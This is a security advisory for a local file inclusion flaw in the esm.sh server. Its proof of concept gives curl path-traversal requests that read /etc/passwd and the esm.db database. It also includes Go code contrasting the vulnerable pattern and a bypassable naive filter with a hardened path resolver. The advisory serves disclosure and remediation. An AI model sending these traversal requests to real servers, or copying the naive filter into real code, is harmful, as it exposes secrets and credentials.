
esm.sh has File Inclusion issue

GHSA-49pv-gwxp-532r · CVE-2025-59341 · GO-2025-3962


Description

Summary

A Local File Inclusion (LFI) issue was identified in the esm.sh service URL handling. An attacker could craft a request that causes the server to read and return files from the host filesystem (or other unintended file sources).

Severity: High — LFI can expose secrets, configuration files, credentials, or enable further compromise.
Impact: reading configuration files, private keys, environment files, or other sensitive files; disclosure of secrets or credentials; information leakage that could enable further attacks.

The vulnerable code is in this file: https://github.com/esm-dev/esm.sh/blob/c62f191d32639314ff0525d1c3c0e19ea2b16143/server/router.go#L1168


Proof of Concept

  1. Using this default config file that I copied from the repo, the server is running at http://localhost:9999 with this command: go run server/esmd/main.go --config=config.json
{
  "port": 9999,
  "npmRegistry": "https://registry.npmjs.org/",
  "npmToken": "******"
}
  2. Trigger the LFI by sending one of the commands below to read a local file (the --path-as-is flag stops curl from collapsing the ../ segments client-side, so the raw path reaches the server)
# read /etc/passwd
curl --path-as-is 'http://localhost:9999/pr/x/y@99/../../../../../../../../../../etc/passwd?raw=1&module=1'

# or read the database esm.db file
curl --path-as-is 'http://localhost:9999/pr/x/y@99/../../../../../../../esm.db?raw=1&module=1'

Remediation

Reject or normalize any .. segment in the URL path before the file is read, and verify that the resulting path still lies inside the intended directory. Note that deleting the literal string ../ from the path is not enough on its own: a single-pass replace turns ....// into ../, so normalize the decoded path (for example with path.Clean) and then check the result against the allowed root. See more details in this guide
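As an added illustration, not code from the esm.sh project or from this advisory, the following Go program contrasts the class of bug described above with a hardened resolver. The storage root /srv/esm, the function names and the sample request paths are assumptions made for the example; the hardened resolver expects the already URL-decoded path that net/http exposes as r.URL.Path.

```go
package main

import (
	"errors"
	"fmt"
	"path"
	"path/filepath"
	"strings"
)

// Hypothetical storage root for the example; not the esm.sh layout.
const root = "/srv/esm"

var errTraversal = errors.New("request path escapes the storage root")

// vulnerableBuild illustrates the bug class behind this advisory (not the
// esm.sh source): the raw URL path is concatenated onto the root without
// normalization, so "../" segments walk out of root once the OS resolves it.
func vulnerableBuild(root, urlPath string) string {
	return root + urlPath
}

// stripDotDotSlash is the naive fix of deleting the literal "../". It is a
// negative example: strings.ReplaceAll makes a single left-to-right pass, so
// "....//" collapses to "../" and the traversal survives the filter.
func stripDotDotSlash(urlPath string) string {
	return strings.ReplaceAll(urlPath, "../", "")
}

// resolveInRoot is the hardened form. It refuses any ".." segment in the
// decoded request path, normalizes the remainder, and then verifies that the
// joined filesystem path is still inside root.
func resolveInRoot(root, urlPath string) (string, error) {
	// A legitimate module path never needs "..", so reject it outright.
	for _, seg := range strings.Split(urlPath, "/") {
		if seg == ".." {
			return "", errTraversal
		}
	}
	// path.Clean on a rooted path collapses "." and repeated slashes and can
	// never produce a leading "..", so the cleaned path is confined to "/".
	clean := path.Clean("/" + urlPath)
	full := filepath.Join(root, filepath.FromSlash(clean))
	// Defense in depth: confirm the joined path still sits under root.
	rel, err := filepath.Rel(root, full)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", errTraversal
	}
	return full, nil
}

func main() {
	// Constructed request paths: the advisory's traversal shape and a benign one.
	poc := "/pr/x/y@99/../../../../../../../../../../etc/passwd"
	benign := "/pr/x/y@99/dist/index.js"

	fmt.Println("vulnerable:", filepath.Clean(vulnerableBuild(root, poc)))
	fmt.Println("naive strip:", stripDotDotSlash("/pr/x/....//....//etc/passwd"))
	if _, err := resolveInRoot(root, poc); err != nil {
		fmt.Println("hardened rejects PoC:", err)
	}
	if p, err := resolveInRoot(root, benign); err == nil {
		fmt.Println("hardened accepts:", p)
	}
}
```

The segment check and the containment check are deliberately redundant: the first gives a clear rejection for hostile input, the second catches any future code path that builds a filesystem path from request data without going through the cleaning step.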

Credits
